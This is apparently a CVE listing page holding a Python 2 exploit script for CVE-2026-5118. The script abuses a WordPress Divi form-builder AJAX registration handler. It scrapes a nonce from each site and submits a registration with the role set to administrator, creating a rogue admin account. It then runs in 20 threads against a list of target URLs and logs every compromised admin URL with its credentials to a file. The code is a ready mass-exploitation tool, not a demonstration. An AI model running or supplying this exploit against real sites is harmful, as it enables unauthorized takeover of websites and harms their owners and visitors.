5465 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-5118
README.md
Rendering markdown...
POC / CVE-2026-5118.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python2
# -*- coding: utf-8 -*-

import re
import sys
import urllib2
import threading
from Queue import Queue
import time

GREEN = '\033[92m'
RED = '\033[91m'
YELLOW = '\033[93m'
RESET = '\033[0m'

DEFAULT_USERNAME = "Attacker"
DEFAULT_PASSWORD = "Attacker@123#+"
DEFAULT_EMAIL    = "[email protected]" 
THREAD_COUNT = 20
OUTPUT_FILE = "results.txt"

write_lock = threading.Lock()

def normalize_url(url):
    url = url.strip()
    if not url:
        return None
    if not url.startswith(('http://', 'https://')):
        url = 'https://' + url
    return url.rstrip('/')

def extract_nonce(target_url):
    try:
        req = urllib2.Request(target_url, headers={'User-Agent': 'Mozilla/5.0'})
        response = urllib2.urlopen(req, timeout=10)
        html = response.read()

        n = re.search(r'fb_nonce["\']?\s*[:=]\s*["\']([^"\']+)', html)
        if not n:
            n = re.search(r'name=["\']fb_nonce["\'][^>]*value=["\']([^"\']+)', html)
        if not n:
            n = re.search(r'de_fb_obj\s*=\s*\{[^}]*"fb_nonce"\s*:\s*"([a-f0-9]+)"', html)
        if not n:
            obj_match = re.search(r'de_fb_obj\s*=\s*({.*?});', html, re.DOTALL)
            if obj_match:
                obj_str = obj_match.group(1)
                n = re.search(r'"fb_nonce"\s*:\s*"([^"]+)"', obj_str)
        if not n:
            n = re.search(r'"fb_nonce"\s*:\s*"([a-f0-9]+)"', html)

        if n:
            return n.group(1)
        return None
    except Exception:
        return None

def build_multipart_data(fields, boundary):
    lines = []
    for k, v in fields.items():
        lines.append("--" + boundary)
        lines.append('Content-Disposition: form-data; name="{}"'.format(k))
        lines.append("")
        lines.append(str(v))
    lines.append("--" + boundary + "--")
    lines.append("")
    return "\r\n".join(lines)

def exploit(target_base, username, password, email):
    ajax_url = target_base + "/wp-admin/admin-ajax.php"
    nonce = extract_nonce(target_base)
    if not nonce:
        return False

    form_data = {
        "action": "de_fb_ajax_submit_ajax_handler",
        "fb_nonce": nonce,
        "role": "administrator",
        "form_type": "register",
        "divi-form-submit": "yes",
        "de_fb_user_login": username,
        "user_login": username,
        "de_fb_user_pass": password,
        "user_pass": password,
        "de_fb_user_email": email,
        "user_email": email,
    }

    boundary = "----WebKitFormBoundary7MA4YWxkTrZu0gW"
    body = build_multipart_data(form_data, boundary)

    host = target_base.replace('https://', '').replace('http://', '').split('/')[0]
    headers = {
        'Host': host,
        'Content-Type': 'multipart/form-data; boundary={}'.format(boundary),
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0',
        'Content-Length': str(len(body))
    }

    try:
        req = urllib2.Request(ajax_url, data=body, headers=headers)
        resp = urllib2.urlopen(req, timeout=15)
        result = resp.read().lower()
        success_strings = ["registration successful", "success", "user_id", "user created", "registered", "account created"]
        return any(s in result for s in success_strings)
    except Exception:
        return False

def save_success(target, username, password):
    admin_url = target.rstrip('/') + "/wp-admin/"
    line = "{}|{}|{}\n".format(admin_url, username, password)
    with write_lock:
        with open(OUTPUT_FILE, 'a') as f:
            f.write(line)
    print(GREEN + "[+] SUCCESS! {}".format(admin_url) + RESET)

def worker(queue, total):
    while True:
        try:
            target = queue.get(timeout=2)
        except:
            break
        idx = total - queue.qsize()
        print(YELLOW + "[{}] Checking {}".format(idx, target) + RESET)
        if exploit(target, DEFAULT_USERNAME, DEFAULT_PASSWORD, DEFAULT_EMAIL):
            save_success(target, DEFAULT_USERNAME, DEFAULT_PASSWORD)
        else:
            print(RED + "[{}] FAILED  {}".format(idx, target) + RESET)
        queue.task_done()
        time.sleep(0.5)

def load_targets(filepath):
    targets = []
    try:
        with open(filepath, 'r') as f:
            for line in f:
                raw = line.strip()
                if raw:
                    norm = normalize_url(raw)
                    if norm:
                        targets.append(norm)
        return targets
    except Exception as e:
        print(RED + "[-] Error reading file: {}".format(e) + RESET)
        sys.exit(1)

def main():
    if len(sys.argv) != 2:
        print("Usage: python2 {} list.txt".format(sys.argv[0]))
        sys.exit(1)

    targets = load_targets(sys.argv[1])
    if not targets:
        print(RED + "[-] No valid targets found." + RESET)
        sys.exit(1)


    print("[*] Total targets : {}".format(len(targets)))
    print("[*] Credentials   : {} / {}".format(DEFAULT_USERNAME, DEFAULT_PASSWORD))
    print("[*] Threads       : {}".format(THREAD_COUNT))
    print("[*] Output file   : {}\n".format(OUTPUT_FILE))

    q = Queue()
    for t in targets:
        q.put(t)

    threads = []
    for _ in range(THREAD_COUNT):
        t = threading.Thread(target=worker, args=(q, len(targets)))
        t.daemon = True
        t.start()
        threads.append(t)

    q.join()

    with open(OUTPUT_FILE, 'r') as f:
        success = sum(1 for _ in f)
    print("\n=== DONE ===")
    print("Successful: {} / {}".format(success, len(targets)))

if __name__ == "__main__":
    main()